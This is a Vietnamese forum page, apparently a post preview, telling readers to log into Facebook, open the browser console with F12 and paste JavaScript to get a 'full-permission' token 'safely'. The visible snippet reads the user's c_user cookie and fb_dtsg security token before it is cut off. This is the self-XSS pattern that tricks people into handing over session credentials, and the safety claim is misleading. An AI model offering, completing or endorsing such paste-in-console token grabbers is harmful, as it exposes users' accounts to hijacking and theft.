Chào mừng!

Bằng cách đăng ký với chúng tôi, bạn sẽ có thể thảo luận, chia sẻ và nhắn tin riêng tư với các thành viên khác trong cộng đồng của chúng tôi.

Đăng ký ngay!

share code lấy token an toàn

  1. Trương Quang Cảnh

    Share Share Code Lấy Token Full Quyền Bằng F12 An Toàn

    CÁC BƯỚC THỰC HIỆN: Bước 1: Vào facebook.com và login nick facebook cần lấy token Bước 2: Nhấn F12 và chuyển sang tab console và dán code dưới đây vào sau đó nhấn Enter var uid = document.cookie.match(/c_user=(\d+)/)[1], dtsg = document.getElementsByName("fb_dtsg")[0].value, http = new...
Top Bottom
AdBlock Detected

We get it, advertisements are annoying!

Sure, ad-blocking software does a great job at blocking ads, but it also blocks useful features of our website. For the best site experience please disable your AdBlocker.

I've Disabled AdBlock
No Thanks